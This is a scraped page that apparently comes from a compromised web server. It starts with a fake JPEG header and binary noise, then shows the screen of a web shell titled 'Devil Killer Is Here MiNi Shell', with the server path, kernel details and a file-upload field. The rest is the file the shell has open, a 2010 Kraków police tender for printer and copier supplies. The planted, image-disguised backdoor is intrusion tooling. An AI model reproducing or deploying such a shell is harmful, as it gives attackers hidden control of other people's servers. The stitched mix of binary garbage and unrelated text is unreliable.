JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/84473-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek oraz faksów dla jednostek Policji woj. małopolskiego.</b><br>
<b>Numer ogłoszenia: 84473 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Krakowie , ul. Mogilska 109, 31-571 Kraków, woj. małopolskie, tel. 012 6154860, 6154862, faks 012 6154887; 6154219.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek oraz faksów dla jednostek Policji woj. małopolskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek i faksów dla jednostek Policji woj. małopolskiego - atramentowych wkładów drukujących, zespołów bębna, głowic drukujących, taśm, kaset z tonerem, zestawów do napełniania.
2.	Szczegółowy opis przedmiotu zamówienia zawierający ilość i asortyment zamawianych materiałów stanowi załącznik nr 2 do SIWZ.
3.	Zamawiający podzielił zamówienie na cztery części (zadania):
1)	Oryginalne lub fabrycznie nowe materiały eksploatacyjne do drukarek i urządzeń wielofunkcyjnych; 
2)	Regenerowane materiały eksploatacyjne do drukarek i urządzeń wielofunkcyjnych; 
3)	Oryginalne lub fabrycznie nowe materiały eksploatacyjne do faksów;
4)	Oryginalne lub fabrycznie nowe tonery do kserokopiarek.
4.	Skróty zastosowane w kolumnie: Typ załącznika nr 2 dla zadania nr 1-3 oznaczają:
1)	A - atramentowy wkład drukujący,
2)	B - zespół bębna,
3)	G - głowica drukująca,
4)	TA - taśma,
5)	TO - kaseta z tonerem,
6)	Z - zestaw do napełniania,
7)	P - pojemnik na zużyty toner.
5.	Skróty zastosowane w kolumnie: Producent załącznika nr 2 dla zadania nr 1-3 oznaczają:
1)	HP - Hewlett Packard,
2)	KM - Konica Minolta.
6.	Zamawiający wymaga, aby zaoferowane przez Wykonawcę materiały były o co najmniej takiej pojemności/ wydajności jak wskazane w załączniku nr 2 do SIWZ, z tym, że:
1)	pojemność podano w mililitrach
2)	wydajność podano w ilości stron przy założeniu 5% pokrycia powierzchni strony.
7.	Jeżeli w tabeli formularza cenowego dla materiału eksploatacyjnego podano sprzecznie Model i nr (dany materiał nie pasuje do wskazanego urządzenia) to każdorazowo należy sugerować się modelem urządzenia i zaoferować materiał eksploatacyjny o maksymalnej pojemności/ wydajności jaki jest produkowany przez producenta danego urządzenia.
8.	Jeżeli w tabeli formularza cenowego dla materiału eksploatacyjnego nie podano pojemności/ wydajności, Zamawiający wymaga zaoferowania materiału o maksymalnej pojemności/ wydajności jaki jest produkowany przez producenta danego urządzenia.
9.	W przypadku materiałów eksploatacyjnych w zadaniu nr 1 oraz w zadaniu nr 3, a także tonerów do kserokopiarek (zadanie nr 4) zaoferowane tonery powinny być tonerami oryginalnymi, pochodzącymi od producenta sprzętu. Zamawiający dopuszcza zaoferowanie tonerów równoważnych, czyli fabrycznie nowych, pod warunkiem, że posiadają one przynajmniej takie same parametry techniczne, jakościowe, funkcjonalne oraz użytkowe jak produkty oryginalne a Wykonawca wykaże, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego.
10.	Przez użycie słów: fabrycznie nowe Zamawiający rozumie materiały eksploatacyjne, które:
-	nie mogą być regenerowane tj. wszystkie elementy produktu muszą być fabrycznie nowe,
-	żaden element produktu nie może pochodzić z procesu recyklingu,
-	nie mogą być poddawane procesowi ponownego napełniania,
-	nie mogą powodować utraty gwarancji producenta urządzenia,
-	nie mogą powodować ograniczeń funkcji i możliwości urządzeń oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta urządzeń,
-	nie mogą ograniczać pełnej współpracy z programem drukarki monitorującym stan zasobników z tuszem lub tonerem,
-	winny posiadać na opakowaniu indywidualny kod tonera, tuszu lub taśmy oraz nazwę urządzenia do którego jest przeznaczony,
-	winny posiadać na produkcie indywidualny kod producenta umożliwiający jednoznaczną identyfikację oraz wszelkie zabezpieczenia stosowane przez producenta np. hologramy czy naklejki identyfikacyjne,
-	nie mogą powodować uszkodzenia urządzeń w których będą eksploatowane,
-	których wydajność oferowanych kaset z tonerem ma być zgodna z normą ISO/IEC 19752 dla monochromatycznych urządzeń i drukarek laserowych oraz normą ISO/IEC 19798 dla oferowanych kaset z tonerem kolorowych drukarek laserowych. Wydajność oferowanych nabojów w kolorze czarnym do drukarek atramentowych ma być zgodna z normą ISO/IEC 24711, zaś dla kolorowych kartridży atramentowych zgodne z normą ISO/IEC 24712,
-	oferowane materiały eksploatacyjne winny posiadać karty danych dotyczących bezpieczeństwa użytkowania produktów przygotowane zgodnie wymogami Dyrektywy Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC lub równoważnymi oraz posiadać certyfikat ISO 14001 lub równoważny na proces ich produkcji, pozwalający zweryfikować spełnianie przepisów związanych z ochroną środowiska oraz potwierdzający, że oferowane materiały eksploatacyjne produkowane są w sposób bezpieczny i niepływający negatywnie na środowisko.
11.	Oferowane przez Wykonawcę regenerowane materiały eksploatacyjne muszą spełniać warunki:
1)	Atramentowe wkłady drukujące:
- Wysoka jakość,;
- Zastosowanie atramentu pigmentowego
2)	Taśma:
- Wymiana wkładu taśmy pętlicowej na nowy,
- Ewentualne dolanie tuszu do zasobnika (jeżeli zasobnik występuje);
3)	Kaseta z tonerem:
- Wysoka jakość,
- Kaseta oryginalna ma być rozmontowana i wyczyszczona,
- Wszystkie uszkodzone elementy muszą być wymienione na nowe,
- Pojemnik na zużyty toner musi być opróżniony,
- Bęben światłoczuły musi być wymieniony na nowy bez względu na stopień jego zużycia,
- Listwa (wałek) czyszcząca musi być wymieniona na nową bez względu na stopień jej zużycia,
- Wałek magnetyczny musi być wymieniony na nowy bez względu na stopień jego zużycia,
- Toner musi być dosypany w ilości gwarantującej wymaganą wydajność;
4)	Zestaw do napełniania:
- Wysoka jakość,
- Zastosowany atrament pigmentowy,
- Ilość atramentu musi gwarantować co najmniej dwukrotne pełne napełnienie wkładu/ głowicy,
- W zestawie musi się znaleźć instrukcja wraz ze wszystkimi materiałami koniecznymi do prawidłowego napełnienia wkładu/ głowicy.
12.	Jeżeli w wyniku zastosowania produktów równoważnych (innych niż oryginalne) w urządzeniach Zamawiającego powstanie szkoda, a autoryzowany serwis urządzenia potwierdzi, że szkoda powstała w wyniku zastosowania nieodpowiednich materiałów eksploatacyjnych Wykonawca będzie zobowiązany do zwrotu kosztów naprawy uszkodzonego sprzętu, a jeżeli awaria sprzętu okaże się niemożliwa do usunięcia - wymiany sprzętu (urządzenia) na nowy, tej samej klasy, zdatnego do użytku lub zwrotu kwoty zapewniającej zakup nowego sprzętu w miejsce uszkodzonego.
13.	Zamawiający wymaga, aby na opakowaniach materiałów eksploatacyjnych były oznaczenia: nazwa i adres Wykonawcy, termin dostawy (miesiąc i rok), nr telefonu i faksu Wykonawcy oraz symbol materiału eksploatacyjnego i model drukarki lub kserokopiarki dla której dany toner jest przeznaczony oraz z którymi dany materiał jest kompatybilny. Dodatkowo materiały eksploatacyjne winny być oznakowane nazwą i adresem Wykonawcy oraz terminem dostawy (miesiąc i rok).
14.	Na wszystkie dostarczone materiały Wykonawca udzieli wieczystej gwarancji, tzn. do czasu wyczerpania środka barwiącego.
15.	W przypadku atramentów zabezpieczonych chipem Zamawiający wymaga, aby ważność do użytkowania wynosiła co najmniej 18 miesięcy od daty ich dostawy. Dodatkowo data ważności winna być umieszczona na opakowaniu materiału.
16.	Zamawiający będzie wymagał, aby materiały eksploatacyjne były dostarczane zapakowane w oddzielne kartony, zgodnie z wykazem dostarczonym Wykonawcy przy podpisaniu umowy (załącznikami do umowy) i zgodnie z tymi załącznikami Wykonawca będzie zobowiązany wystawić odrębne faktury.
17.	Dostawa realizowana będzie do magazynów Zamawiającego zlokalizowanych na terenie miasta Krakowa.
18.	Ponadto, w ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do bezpłatnego odbierania od Zamawiającego i utylizowania zgodnie z prawem zużytych materiałów eksploatacyjnych, w ilości nie większej niż dostarczane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.12-9, 30.12.51.00-2, 30.12.51.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości: 3 100,00 zł (słownie: trzy tysiące sto złotych) z podziałem na zadania:
a) Zadanie 1: 1 000,00 zł;
b) Zadanie 2: 700,00 zł;
c) Zadanie 3: 400,00 zł;
d) Zadanie 4: 1 000,00 zł.
2.	Pozostałe informacje zawarte są w Rozdziale XIV SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą:spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale XI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa Rozdziale X ust. 1 SIWZ zostanie dokonana w następujący sposób: za spełniający warunek, o których mowa w Rozdziale X ust. 1 pkt. 2) i 3) SIWZ zostanie uznany Wykonawca, który wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia. Za dostawę spełniającą warunek posiadania wiedzy i doświadczenia Zamawiający uzna taką dostawę materiałów eksploatacyjnych (np. atramentowych wkładów drukujących, kaset z tonerem) wykonaną lub wykonywaną w przeciągu 12 miesięcy, której wartość netto była większa lub równa odpowiednio:
- w przypadku Zadania nr 1: 50 000,00 zł.;
- w przypadku Zadania nr 2: 40 000,00 zł.;
- w przypadku Zadania nr 3: 20 000,00 zł.;
- w przypadku Zadania nr 4: 50 000,00 zł.
W przypadku składania oferty na więcej niż jedno zadanie wartości te sumują się dla odpowiednich zadań, np. w przypadku składania oferty na zadanie nr 1 i nr 2 za dostawę spełniającą warunek wiedzy i doświadczenia Zamawiający uzna dostawę w wysokości: 90 000,00 zł.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale XI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale XI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą:spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale XI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą:spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale XI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku oferowania w zadaniach nr 1, 3 i 4 materiałów eksploatacyjnych fabrycznie nowych, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca musi przedstawić następujące dokumenty:
1) raporty z testów potwierdzające, że podana wydajność oferowanych materiałów eksploatacyjnych jest wynikiem przeprowadzenia testów zgodnie z normami: ISO/IEC 19752 dla tonerów monochromatycznych, ISO/IEC 19798 dla wkładów do drukarek kolorowych oraz ISO/IEC 24711 dla nabojów do drukarek atramentowych, wystawione przez niezależny podmiot posiadający stosowaną akredytację w zakresie badania produktów pod kątem spełniania powyższych norm lub zaświadczenie wystawione przez niezależny podmiot posiadający stosowaną akredytację w zakresie badania produktów potwierdzające spełniania powyższych norm;
2) karty danych dotyczących bezpieczeństwa użytkowania produktów (materiałów eksploatacyjnych) przygotowane zgodnie wymogami Dyrektywy Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC lub równoważnymi;
3) certyfikat ISO 14001 lub równoważny na proces produkcji materiałów eksploatacyjnych, pozwalający zweryfikować spełnianie przepisów związanych z ochroną środowiska oraz potwierdzający, że oferowane materiały eksploatacyjne produkowane są w sposób bezpieczny i niepływający negatywnie na środowisko.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z projektem umowy - Załącznik nr 5 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.malopolska.policja.gov.pl/zamowienia/zamowienia.php#1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Krakowie
ul. Mogilska 109
31-571 Kraków
Zespół ds. Zamówień Publicznych - pok. 101B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 11:00, miejsce: Komenda Wojewódzka Policji w Krakowie
ul. Mogilska 109
31-571 Kraków
Zespół ds. Zamówień Publicznych - pok. 101B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oryginalne lub fabrycznie nowe materiały eksploatacyjne do drukarek i urządzeń wielofunkcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek i faksów dla jednostek Policji woj. małopolskiego - atramentowych wkładów drukujących, zespołów bębna, głowic drukujących, taśm, kaset z tonerem, zestawów do napełniania.
2.	Szczegółowy opis przedmiotu zamówienia zawierający ilość i asortyment zamawianych materiałów stanowi załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.12-9, 30.12.51.00-2, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Regenerowane materiały eksploatacyjne do drukarek i urządzeń wielofunkcyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek i faksów dla jednostek Policji woj. małopolskiego - atramentowych wkładów drukujących, zespołów bębna, głowic drukujących, taśm, kaset z tonerem, zestawów do napełniania.
2.	Szczegółowy opis przedmiotu zamówienia zawierający ilość i asortyment zamawianych materiałów stanowi załącznik nr 2 do  SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.12-9, 30.12.51.00-2, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oryginalne lub fabrycznie nowe materiały eksploatacyjne do faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek i faksów dla jednostek Policji woj. małopolskiego - atramentowych wkładów drukujących, zespołów bębna, głowic drukujących, taśm, kaset z tonerem, zestawów do napełniania.
2.	Szczegółowy opis przedmiotu zamówienia zawierający ilość i asortyment zamawianych materiałów stanowi załącznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.12-9, 30.12.51.00-2, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oryginalne lub fabrycznie nowe tonery do kserokopiarek.</p>
